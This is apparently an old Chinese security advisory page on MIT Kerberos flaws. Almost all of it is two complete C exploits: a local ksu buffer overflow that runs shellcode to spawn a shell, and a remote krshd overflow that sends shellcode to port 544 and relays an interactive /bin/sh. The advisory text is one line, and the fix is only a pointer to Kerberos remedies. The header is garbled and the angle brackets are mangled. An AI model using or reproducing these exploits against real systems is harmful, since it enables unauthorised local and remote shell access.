┒捶⒉际奔洌?2000-5-22 11:19:00
漏 洞 描 述:

ksux本地漏洞测试程序：

/********
* ksux.c -- ksu exploit
* written January 26, 2000
* Jim Paris $#@60;jim@jtan.com$#@62;
*
* This program exploits a vulnerability in the ksu utility included
* with the MIT Kerberos distribution. Versions prior to 1.1.1 are
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0. Exploits
* for other operating systems and versions of Kerberos should also work.
*
* Since krb5_parse_name will reject input with an @ or /, this shellcode
* execs sh instead of /bin/sh. As a result, a copy of sh must
* reside in the current directory for the exploit to work.
*
*/

#include $#@60;stdlib.h$#@62;
#include $#@60;stdio.h$#@62;

int get_esp(void) { __asm__("movl %esp,%eax"); }

char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh";

#define LEN 0x300
#define RET_OFFSET 0x240
#define JMP_OFFSET 0x240
#define CODE_OFFSET 0x100

int main(int argc, char *argv[])
{
int esp=get_esp();
int i,j; char b[LEN];

memset(b,0x90,LEN);
memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
*(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
b[RET_OFFSET+4]=0;

execlp("ksu","ksu","-n",b,NULL);
}

kshux远程漏洞测试程序：

/********
* kshux.c -- krshd remote exploit
* written April 8, 2000
* Jim Paris $#@60;jim@jtan.com$#@62;
*
* This program exploits a vulnerability in the krshd daemon included
* with the MIT Kerberos distribution. All versions are apparently
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0, but youll
* probably need a fair bit of xing to get it to work.
*
* And yes, its ugly. I need to accept an incoming connection from the
* remote server, handle the fact that the overflow goes through two
* functions and a toupper(), make sure that certain overwritten pointers
* on the remote hosts stack are set to valid values so that a strlen
* call in krb425_conv_principal() doesnt cause a segfault before we
* return into the shellcode, adjust the offset depending on the remote
* hostname to properly align things, etc etc. As a result, youll
* probably have a hard time getting this to work -- it took a lot of
* hacking and hardcoded numbers to get this to work against my test
* systems.
*
*/

#include $#@60;stdio.h$#@62;
#include $#@60;sys/types.h$#@62;
#include $#@60;netdb.h$#@62;
#include $#@60;time.h$#@62;
#include $#@60;netinet/in.h$#@62;

#define LEN 1200
#define OFFSET 0
#define ADDR 0xbfffd7a4

char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

void get_incoming(int r) {
int s, l=1; struct sockaddr_in sa, ra;
bzero(&sa,sizeof(sa));
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=htonl(INADDR_ANY);
sa.sin_port=htons(16474);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l));
if(bind(s,(struct sockaddr *)&sa,sizeof(sa))$#@60;0)
perror("bind"),exit(1);
if(listen(s,1))
perror("listen"),exit(1);
write(r,"16474",6);
if(accept(s,&sa,&l)$#@60;0)
perror("accept"),exit(1);
}

int con_outgoing(char *h) {
int s, i; struct sockaddr_in a; struct hostent *e;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
if((i=inet_addr(h))==INADDR_NONE) {
if((e=gethostbyname(h))==NULL)
perror("gethostbyname"),exit(1);
bcopy(e-$#@62;h_addr,&i,sizeof(i)); }
bzero(&a,sizeof(a));
a.sin_family=AF_INET;
a.sin_addr.s_addr=i;
a.sin_port=htons(544);
if(connect(s,(struct sockaddr *)&a,sizeof(a))$#@60;0)
perror("connect"),exit(1);
return s;
}

void bus(int s) {
int i; fd_set r; char b[1024];
for(;;) {
FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r);
if((i=select(s+1,&r,NULL,NULL,NULL))==-1)
perror("select"),exit(1);
if(i==0) fprintf(stderr,"closed\n"),exit(0);
if(FD_ISSET(s,&r)) {
if((i=read(s,b,sizeof(b)))$#@60;1)
fprintf(stderr,"closed\n"),exit(0);
write(1,b,i); }
if(FD_ISSET(0,&r)) {
if((i=read(0,b,sizeof(b)))$#@60;1)
fprintf(stderr,"closed\n"),exit(0);
write(s,b,i); } }
}

void main(int ac, char *av[])
{
int s, i, j, a=ADDR, o=OFFSET;
int l, h;
char b[LEN];

if(ac$#@60;2) {
fprintf(stderr,"%s hostname [addr] [offset]\n",*av);
exit(1);
}
a+=(ac$#@62;2)?atoi(av[2]):0;
o+=(ac$#@62;3)?atoi(av[3]):(4-(strlen(av[1])%4));
o%=4;
if(o$#@60;0) o+=4;
l=(ac$#@62;4)?atoi(av[4]):-10;
h=(ac$#@62;5)?atoi(av[5]):10;
fprintf(stderr,"addr=%p, offset=%d\n",a,o);

if(isupper(((char *)&a)[0]) ||
isupper(((char *)&a)[1]) ||
isupper(((char *)&a)[2]) ||
isupper(((char *)&a)[3]))
fprintf(stderr,"error: addr contains uppercase\n"),exit(0);

s=con_outgoing(av[1]);
get_incoming(s);

sprintf(&b[0],"AUTHV0.1blahblah");
*(int *)(b+16)=htonl(LEN);
b[20]=4; b[21]=7; b[22]=123;
write(s,b,23);

for(i=0;i$#@60;LEN-8-strlen(sc)-1;i++) b[i]=0x90;
bcopy(sc,b+i,strlen(sc)+1);
for(i=LEN-8;i$#@60;LEN;i++) b[i]=0x00;

for(i=255+o+l*4;i$#@60;=255+o+h*4;i+=4) *(int *)(b+i)=(a-4);
*(int *)(b+251+o)=a;

write(s,b,LEN);

bus(s);
}

解 决 方 法:

参考Kerberos补救方法。